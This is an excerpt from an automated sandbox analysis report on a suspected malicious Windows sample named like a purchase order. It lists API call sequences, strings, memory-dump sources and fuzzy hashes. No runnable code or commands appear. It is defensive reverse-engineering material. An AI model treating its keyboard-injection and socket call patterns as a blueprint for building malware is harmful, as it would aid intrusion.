                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 001E39C6
                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001E39F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$Window_wcslen
                                • String ID: SysListView32
                                • API String ID: 2147712094-78025650
                                • Opcode ID: a135c13ea51f2964d0751807dc5f4ca7809efabed0c4a4e2975d80a924fa7936
                                • Instruction ID: 9db0d4df2c00c80341ee16081c51dc1334948c9655e67df7deb285624b15314b
                                • Opcode Fuzzy Hash: a135c13ea51f2964d0751807dc5f4ca7809efabed0c4a4e2975d80a924fa7936
                                • Instruction Fuzzy Hash: 1241E371A00658ABEF219FA5CC49FEE7BA9EF18354F100126F958E7281D3719E90CB90
                                APIs
                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001BBCFD
                                • IsMenu.USER32(00000000), ref: 001BBD1D
                                • CreatePopupMenu.USER32 ref: 001BBD53
                                • GetMenuItemCount.USER32(00E16D80), ref: 001BBDA4
                                • InsertMenuItemW.USER32(00E16D80,?,00000001,00000030), ref: 001BBDCC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                • String ID: 0$2
                                • API String ID: 93392585-3793063076
                                • Opcode ID: 52128056aaac85130923b9c62f084c4e0da1d7efccbd9cc5b6b8c93d01afd0c2
                                • Instruction ID: bb0bc936a68165adbb68e0296196e86f49f71d1afac3797594fbcbf068e24f87
                                • Opcode Fuzzy Hash: 52128056aaac85130923b9c62f084c4e0da1d7efccbd9cc5b6b8c93d01afd0c2
                                • Instruction Fuzzy Hash: CB51BC70A082059BDF20DFE8C8C4BEEBBF4AF55318F148219E4119B690D7B89941CB61
                                APIs
                                • LoadIconW.USER32(00000000,00007F03), ref: 001BC913
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: IconLoad
                                • String ID: blank$info$question$stop$warning
                                • API String ID: 2457776203-404129466
                                • Opcode ID: 2c514eccabfc15adf1696b9e52baa5edfa602c58915372d3cc96f08d92bc6db4
                                • Instruction ID: f98782c61d5c66b75660f51c44c93885ee7c5e7323db40f275ea99c727471dd4
                                • Opcode Fuzzy Hash: 2c514eccabfc15adf1696b9e52baa5edfa602c58915372d3cc96f08d92bc6db4
                                • Instruction Fuzzy Hash: 85112732689307BBB7049B549C83CEE67ECDF66328B20402EF504E61C2E7A05E4152E4
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$LocalTime
                                • String ID:
                                • API String ID: 952045576-0
                                • Opcode ID: bfab4b97eef427081d69d092a41d3d82759b8c6cce71aa5053466bf0277e0a68
                                • Instruction ID: 19010e2562ae34a959a41287c8e3916f8784c6c51ea4b9a37a15ce89ceb5bf6a
                                • Opcode Fuzzy Hash: bfab4b97eef427081d69d092a41d3d82759b8c6cce71aa5053466bf0277e0a68
                                • Instruction Fuzzy Hash: 8F41B065D1021876CB11EBF48C8A9CFB7B8AF59310F50C566E618E3122FB34E245C3A6
                                APIs
                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001A682C,00000004,00000000,00000000), ref: 0016F953
                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,001A682C,00000004,00000000,00000000), ref: 001AF3D1
                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,001A682C,00000004,00000000,00000000), ref: 001AF454
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ShowWindow
                                • String ID:
                                • API String ID: 1268545403-0
                                • Opcode ID: 7a16cacc49351f64e96d44e49f461ab8a1d69b1c8b16faf67282470e9b96f0fa
                                • Instruction ID: e94ceb3c56ffcf0ba9b214efb9f8b4485fb1dc5b55187ef507d9665cf6d71f23
                                • Opcode Fuzzy Hash: 7a16cacc49351f64e96d44e49f461ab8a1d69b1c8b16faf67282470e9b96f0fa
                                • Instruction Fuzzy Hash: 4A410935608780BAD73D8B69AC8872A7BA2AF5631CF15443CF09756661C731A8D3C751
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 001E2D1B
                                • GetDC.USER32(00000000), ref: 001E2D23
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001E2D2E
                                • ReleaseDC.USER32(00000000,00000000), ref: 001E2D3A
                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 001E2D76
                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 001E2D87
                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,001E5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 001E2DC2
                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 001E2DE1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                • String ID:
                                • API String ID: 3864802216-0
                                • Opcode ID: a3777eac07b0b9a47bbecdd9593234ed874a199dd105b77f9ad4691d74c1b790
                                • Instruction ID: afb106ebb2db59178556dfafee4bfa6ac45bd29c4be9e90473ad9daad599c3e4
                                • Opcode Fuzzy Hash: a3777eac07b0b9a47bbecdd9593234ed874a199dd105b77f9ad4691d74c1b790
                                • Instruction Fuzzy Hash: C4318B72201694BBEB118F958C8AFEB3BADFB49721F044055FE089E291C6759C81CBA0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _memcmp
                                • String ID:
                                • API String ID: 2931989736-0
                                • Opcode ID: c8b9c143c3571e2200eac6c3bafb2ce8a2e75001a987776ff9b8f08d8493fb09
                                • Instruction ID: 682f8180fb140e0e32a4be302102a355d1615436a367aa8c72d12408b50f7651
                                • Opcode Fuzzy Hash: c8b9c143c3571e2200eac6c3bafb2ce8a2e75001a987776ff9b8f08d8493fb09
                                • Instruction Fuzzy Hash: C5219571B40E0977E31857259D82FFE336FAF34398F644024FD099A581FB60EE1182A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: NULL Pointer assignment$Not an Object type
                                • API String ID: 0-572801152
                                • Opcode ID: eb21c907d6a28a0119f7de790b24e32e4020adac705a96a2a1b0fedc788823ab
                                • Instruction ID: 3560b28db44aeef5e7eabe52e4c8c202c8b89c5d13e623014a1a6dceb9ec4828
                                • Opcode Fuzzy Hash: eb21c907d6a28a0119f7de790b24e32e4020adac705a96a2a1b0fedc788823ab
                                • Instruction Fuzzy Hash: B0D1A375A0060AAFDF14CF98C881FAEB7B6BF58344F14816AE915AB381D770DD45CB90
                                APIs
                                • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,001917FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 001915CE
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00191651
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,001917FB,?,001917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001916E4
                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,001917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 001916FB
                                  • Part of subcall function 00183820: RtlAllocateHeap.NTDLL(00000000,?,00221444,?,0016FDF5,?,?,0015A976,00000010,00221440,001513FC,?,001513C6,?,00151129), ref: 00183852
                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,001917FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00191777
                                • __freea.LIBCMT ref: 001917A2
                                • __freea.LIBCMT ref: 001917AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                • String ID:
                                • API String ID: 2829977744-0
                                • Opcode ID: 5049ad808e388f8e04065e17c1c95628c894ec8347da765511675c85cfeac180
                                • Instruction ID: 810b5fdb06090c8d00c7f64b38a95847b10edb0fcfd4a2fd07fd7a2f8f47280d
                                • Opcode Fuzzy Hash: 5049ad808e388f8e04065e17c1c95628c894ec8347da765511675c85cfeac180
                                • Instruction Fuzzy Hash: 6691C672E00217BAEF258EB4CC81AEE7BB5AF5A710F1A4659E901E7141D735DDC0CBA0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$ClearInit
                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                • API String ID: 2610073882-625585964
                                • Opcode ID: fc887380e31372e9ac7bbd29d5c675f276c391ff8b9fcc03de8532a23090864f
                                • Instruction ID: 57a0338dcf22794d1dad4bf5452eefe52044abafc1237a82b094850b477e9130
                                • Opcode Fuzzy Hash: fc887380e31372e9ac7bbd29d5c675f276c391ff8b9fcc03de8532a23090864f
                                • Instruction Fuzzy Hash: D8919E71A00219ABDF24CFA5DC88FEEBBB8EF56714F10855AF515AB280D7709941CFA0
                                APIs
                                • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 001C125C
                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 001C1284
                                • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 001C12A8
                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001C12D8
                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001C135F
                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001C13C4
                                • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 001C1430
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ArraySafe$Data$Access$UnaccessVartype
                                • String ID:
                                • API String ID: 2550207440-0
                                • Opcode ID: 37deaaf7445836110204608e4ccc5909ca66d924053c45b9db65abdb52682a7f
                                • Instruction ID: 5adb90f8b5bb69ad778708e3e2fd8a1adf3db86139209ecab48879971ab4994a
                                • Opcode Fuzzy Hash: 37deaaf7445836110204608e4ccc5909ca66d924053c45b9db65abdb52682a7f
                                • Instruction Fuzzy Hash: A791CE76A40218AFDB059FA4C885FAEB7B5FF66315F204029E910EB292D774E941CB90
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ObjectSelect$BeginCreatePath
                                • String ID:
                                • API String ID: 3225163088-0
                                • Opcode ID: f8768f430eebdfdda10ec9d8c8cfe4aae5b670a84d9c746c21577591209478ba
                                • Instruction ID: ef8d196e12e32cea5d0e1c3bcd1193507a7d2b171d7817dbc55942b3080245ad
                                • Opcode Fuzzy Hash: f8768f430eebdfdda10ec9d8c8cfe4aae5b670a84d9c746c21577591209478ba
                                • Instruction Fuzzy Hash: 6C913975D00219EFCB14CFA9CC84AEEBBB8FF49320F14415AE516B7251D774AA52CBA0
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 001D396B
                                • CharUpperBuffW.USER32(?,?), ref: 001D3A7A
                                • _wcslen.LIBCMT ref: 001D3A8A
                                • VariantClear.OLEAUT32(?), ref: 001D3C1F
                                  • Part of subcall function 001C0CDF: VariantInit.OLEAUT32(00000000), ref: 001C0D1F
                                  • Part of subcall function 001C0CDF: VariantCopy.OLEAUT32(?,?), ref: 001C0D28
                                  • Part of subcall function 001C0CDF: VariantClear.OLEAUT32(?), ref: 001C0D34
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                • API String ID: 4137639002-1221869570
                                • Opcode ID: 9bf0180688d7809b7bb7f7e56f34186ac30b5bffe8493baf72671841bae5ca96
                                • Instruction ID: d59f9b4b4d00e01cb4ea84a3029495dd67bd2261d3ee5dee213dc65927c66740
                                • Opcode Fuzzy Hash: 9bf0180688d7809b7bb7f7e56f34186ac30b5bffe8493baf72671841bae5ca96
                                • Instruction Fuzzy Hash: 889146756083059FC704DF68C48196AB7E4FF99314F14892EF8A99B351DB30EE4ACB92
                                APIs
                                  • Part of subcall function 001B000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?,?,001B035E), ref: 001B002B
                                  • Part of subcall function 001B000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?), ref: 001B0046
                                  • Part of subcall function 001B000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?,?), ref: 001B0054
                                  • Part of subcall function 001B000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,001AFF41,80070057,?), ref: 001B0064
                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 001D4C51
                                • _wcslen.LIBCMT ref: 001D4D59
                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 001D4DCF
                                • CoTaskMemFree.OLE32(?), ref: 001D4DDA
                                Strings
                                Similarity
                                • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                • String ID: NULL Pointer assignment
                                • API String ID: 614568839-2785691316
                                • Opcode ID: a28cd172c980bb7c2b72dfe04b3e9b985ea876434fb7076bf28810a20e567230
                                • Instruction ID: 497e6a480804c7b526e933b0ee2296550c55920cdd8f40c58cd4bd61804da7a2
                                • Opcode Fuzzy Hash: a28cd172c980bb7c2b72dfe04b3e9b985ea876434fb7076bf28810a20e567230
                                • Instruction Fuzzy Hash: AD912871D0021DEFDF14DFA4D890AEEB7B9BF18300F10856AE915AB251EB349A45CFA0
                                APIs
                                • GetMenu.USER32(?), ref: 001E2183
                                • GetMenuItemCount.USER32(00000000), ref: 001E21B5
                                • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 001E21DD
                                • _wcslen.LIBCMT ref: 001E2213
                                • GetMenuItemID.USER32(?,?), ref: 001E224D
                                • GetSubMenu.USER32(?,?), ref: 001E225B
                                  • Part of subcall function 001B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 001B3A57
                                  • Part of subcall function 001B3A3D: GetCurrentThreadId.KERNEL32 ref: 001B3A5E
                                  • Part of subcall function 001B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,001B25B3), ref: 001B3A65
                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001E22E3
                                  • Part of subcall function 001BE97B: Sleep.KERNEL32 ref: 001BE9F3
                                Similarity
                                • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                • String ID:
                                • API String ID: 4196846111-0
                                • Opcode ID: 555fa9440286b9d5766c7aee3b4bb751a797053557af7ebb261da0cb8e99762c
                                • Instruction ID: 6abf312e980f005740193208f491d0deae66b1fa474671bff13df6a85d3f70ab
                                • Opcode Fuzzy Hash: 555fa9440286b9d5766c7aee3b4bb751a797053557af7ebb261da0cb8e99762c
                                • Instruction Fuzzy Hash: 6C71AE35A00645AFCB14DFA5C891AAEB7F9FF88310F158459E916EB341D734AE42CB90
                                APIs
                                • GetParent.USER32(?), ref: 001BAEF9
                                • GetKeyboardState.USER32(?), ref: 001BAF0E
                                • SetKeyboardState.USER32(?), ref: 001BAF6F
                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 001BAF9D
                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 001BAFBC
                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 001BAFFD
                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 001BB020
                                Similarity
                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: 786c580ce47c0f453a70814c55d2e0c58b5650b15826ce62ce52383e5c87b576
                                • Instruction ID: dac5de2974aca9ccb496804d4b9a7f551d9fde4a4f99d0f320c6b5ec96ce985f
                                • Opcode Fuzzy Hash: 786c580ce47c0f453a70814c55d2e0c58b5650b15826ce62ce52383e5c87b576
                                • Instruction Fuzzy Hash: AF5190A06086D53DFB3652348C85BFBBEA95F06304F088589F1D9958C2D3D9ECC8D751
                                APIs
                                • GetParent.USER32(00000000), ref: 001BAD19
                                • GetKeyboardState.USER32(?), ref: 001BAD2E
                                • SetKeyboardState.USER32(?), ref: 001BAD8F
                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 001BADBB
                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 001BADD8
                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 001BAE17
                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 001BAE38
                                Similarity
                                • API ID: MessagePost$KeyboardState$Parent
                                • String ID:
                                • API String ID: 87235514-0
                                • Opcode ID: e489662e0194fa4dc151e090ed9b9a636defc6ab207cb37ed695ea6895ba3db1
                                • Instruction ID: b387c0bd654c96bad5cc1972d8742514232456cafa250787bba7d2ce5f0491fc
                                • Opcode Fuzzy Hash: e489662e0194fa4dc151e090ed9b9a636defc6ab207cb37ed695ea6895ba3db1
                                • Instruction Fuzzy Hash: D751E4A15487D53DFB378374CC95BFABEA96F46300F488588E1D54A8C2D394EC88D7A2
                                APIs
                                • GetConsoleCP.KERNEL32(00193CD6,?,?,?,?,?,?,?,?,00185BA3,?,?,00193CD6,?,?), ref: 00185470
                                • __fassign.LIBCMT ref: 001854EB
                                • __fassign.LIBCMT ref: 00185506
                                • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00193CD6,00000005,00000000,00000000), ref: 0018552C
                                • WriteFile.KERNEL32(?,00193CD6,00000000,00185BA3,00000000,?,?,?,?,?,?,?,?,?,00185BA3,?), ref: 0018554B
                                • WriteFile.KERNEL32(?,?,00000001,00185BA3,00000000,?,?,?,?,?,?,?,?,?,00185BA3,?), ref: 00185584
                                Similarity
                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                • String ID:
                                • API String ID: 1324828854-0
                                • Opcode ID: 1d5916ab0e68bb1553ee2df6cfac5778df7a8bc65b6980f6f076bf363dcf3b42
                                • Instruction ID: dbde87495da6e2d9df10f0ebd46500292045b2dffb53d838f70d18f6778a6993
                                • Opcode Fuzzy Hash: 1d5916ab0e68bb1553ee2df6cfac5778df7a8bc65b6980f6f076bf363dcf3b42
                                • Instruction Fuzzy Hash: 87519F71A00649AFDB11DFA8D885AEEBBFAEF09300F14415AF955E7291E7309B41CF60
                                APIs
                                • _ValidateLocalCookies.LIBCMT ref: 00172D4B
                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00172D53
                                • _ValidateLocalCookies.LIBCMT ref: 00172DE1
                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00172E0C
                                • _ValidateLocalCookies.LIBCMT ref: 00172E61
                                Strings
                                Similarity
                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                • String ID: csm
                                • API String ID: 1170836740-1018135373
                                • Opcode ID: 0557981be209ae9319fdff673b4b2b91529861c63093b03076ed0b93eef9aebd
                                • Instruction ID: 477094b1e5a97a89e4be78ca1f042e6d51c198d0134c82dffcc25e615776d1cc
                                • Opcode Fuzzy Hash: 0557981be209ae9319fdff673b4b2b91529861c63093b03076ed0b93eef9aebd
                                • Instruction Fuzzy Hash: 7741A234E00209ABCF20DFA8C855A9EBBB5BF58324F14C155E91C6B352D731EA42CB91
                                APIs
                                  • Part of subcall function 001D304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001D307A
                                  • Part of subcall function 001D304E: _wcslen.LIBCMT ref: 001D309B
                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001D1112
                                • WSAGetLastError.WSOCK32 ref: 001D1121
                                • WSAGetLastError.WSOCK32 ref: 001D11C9
                                • closesocket.WSOCK32(00000000), ref: 001D11F9
                                Similarity
                                • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                • String ID:
                                • API String ID: 2675159561-0
                                • Opcode ID: cf86a321b6baff0bdfecc682bbd388cb8f7aba57d0507fac539f2506e8293487
                                • Instruction ID: 5d46c9ce26849d8d226e5e75222893cc1dfccead930eb3cead6aa1fa482eb0b6
                                • Opcode Fuzzy Hash: cf86a321b6baff0bdfecc682bbd388cb8f7aba57d0507fac539f2506e8293487
